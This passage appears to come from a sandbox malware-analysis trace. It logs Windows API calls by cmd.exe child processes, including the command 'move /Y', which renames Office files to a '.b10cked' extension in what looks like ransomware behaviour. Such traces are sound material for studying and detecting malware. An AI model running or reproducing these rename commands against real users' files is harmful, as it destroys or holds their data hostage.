lpBuffer=0x1afb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.274] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1afb50, lpFilePart=0x1afb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1afb4c*="Desktop") returned 0x18 [0172.274] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.275] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af8cc | out: lpFindFileData=0x1af8cc) returned 0x3909f0 [0172.275] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0172.275] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af8cc | out: lpFindFileData=0x1af8cc) returned 0x3909f0 [0172.275] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0172.275] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af8cc | out: lpFindFileData=0x1af8cc) returned 0x3909f0 [0172.275] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0172.275] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.275] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.275] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.275] GetEnvironmentStringsW () returned 0x390210* [0172.276] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0172.276] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.276] GetConsoleOutputCP () returned 0x1b5 [0172.276] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.276] GetUserDefaultLCID () returned 0x409 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afc90, cchData=128 | out: lpLCData="1") returned 2 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.277] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.277] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.278] GetConsoleTitleW (in: lpConsoleTitle=0x380930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.278] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.278] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.278] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.278] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.279] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.279] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.279] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.279] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.279] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.279] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.279] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0172.283] GetConsoleTitleW (in: lpConsoleTitle=0x1af988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.283] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.283] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.283] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.283] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.283] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.283] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.283] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.283] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.283] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.283] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.283] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.284] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.284] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.284] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.284] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.284] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.284] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.284] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.284] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.284] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.284] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.284] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.284] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.284] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.284] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.284] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.284] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.284] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.284] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.284] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.284] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.286] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af744, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af73c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af73c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.286] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.287] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0172.288] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0172.288] _wcsicmp (_String1="ONINTL~1.TRX", _String2="..") returned 65 [0172.288] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~1.trx")) returned 0x2020 [0172.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.609] SetErrorMode (uMode=0x0) returned 0x0 [0172.609] SetErrorMode (uMode=0x1) returned 0x0 [0172.609] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1af0cc, lpFilePart=0x1af0b4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", lpFilePart=0x1af0b4*="ONINTL~1.TRX") returned 0x3c [0172.609] SetErrorMode (uMode=0x0) returned 0x1 [0172.610] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.610] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0172.610] _wcsicmp (_String1="ONINTL~1.TRX", _String2="..") returned 65 [0172.610] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~1.trx")) returned 0x2020 [0172.610] SetErrorMode (uMode=0x0) returned 0x0 [0172.610] SetErrorMode (uMode=0x1) returned 0x0 [0172.610] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1af548, lpFilePart=0x1af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", lpFilePart=0x1af2e0*="ONINTL~1.TRX") returned 0x3c [0172.610] SetErrorMode (uMode=0x0) returned 0x1 
[0172.610] SetErrorMode (uMode=0x0) returned 0x0 [0172.610] SetErrorMode (uMode=0x1) returned 0x0 [0172.610] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1af750, lpFilePart=0x1af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x1af2e0*="ONINTL.DLL.trx_dll.b10cked") returned 0x4a [0172.610] SetErrorMode (uMode=0x0) returned 0x1 [0172.610] SetLastError (dwErrCode=0x0) [0172.610] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll.b10cked")) returned 0xffffffff [0172.611] GetLastError () returned 0x2 [0172.611] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1aec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aec5c) returned 0x392128 [0172.611] FindNextFileW (in: hFindFile=0x392128, lpFindFileData=0x1aec5c | out: lpFindFileData=0x1aec5c) returned 0 [0172.611] GetLastError () returned 0x12 [0172.611] FindClose (in: hFindFile=0x392128 | out: hFindFile=0x392128) returned 1 [0172.613] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x391cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391cb8) returned 0x392128 [0172.614] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0172.614] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0172.614] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll")) returned 0x2020 [0172.617] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.618] FindClose (in: hFindFile=0x392128 | out: hFindFile=0x392128) returned 1 [0172.618] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aeea8 | out: _Buffer=" 1") returned 9 [0172.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.618] GetFileType (hFile=0x7) returned 0x2 [0172.619] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.619] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aee34 | out: lpMode=0x1aee34) returned 1 [0172.619] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.619] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aee68 | out: lpConsoleScreenBufferInfo=0x1aee68) returned 1 [0172.619] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.619] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeea8 | out: lpBuffer=" 1 file(s) 
moved.\r\n") returned 0x1a [0172.619] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aee8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aee8c*=0x1a) returned 1 [0172.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.620] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.620] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.620] SetConsoleInputExeNameW () returned 0x1 [0172.620] GetConsoleOutputCP () returned 0x1b5 [0172.620] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.620] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.621] exit (_Code=0) Process: id = "292" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22935 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22936 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22937 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22938 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 22939 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22940 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22941 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22942 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22943 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22944 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23429 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23430 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
23431 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23432 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 23433 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 23434 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23435 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23436 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23437 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23438 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23439 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23440 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23441 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23442 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23443 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 23444 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23445 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23446 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23447 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23448 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23449 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23450 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 23451 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename 
= "" Region: id = 23452 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 360 os_tid = 0x9d8 [0172.231] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fdcc | out: lpSystemTimeAsFileTime=0x20fdcc*(dwLowDateTime=0x9c8d6d80, dwHighDateTime=0x1d440a9)) [0172.231] GetCurrentProcessId () returned 0xfcc [0172.231] GetCurrentThreadId () returned 0x9d8 [0172.231] GetTickCount () returned 0x32338 [0172.231] QueryPerformanceCounter (in: lpPerformanceCount=0x20fdc4 | out: lpPerformanceCount=0x20fdc4*=22902004557) returned 1 [0172.231] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.231] __set_app_type (_Type=0x1) [0172.231] __p__fmode () returned 0x76b331f4 [0172.232] __p__commode () returned 0x76b331fc [0172.232] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.232] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.232] GetCurrentThreadId () returned 0x9d8 [0172.232] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d8) returned 0x38 [0172.232] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.232] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.232] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fd5c | out: 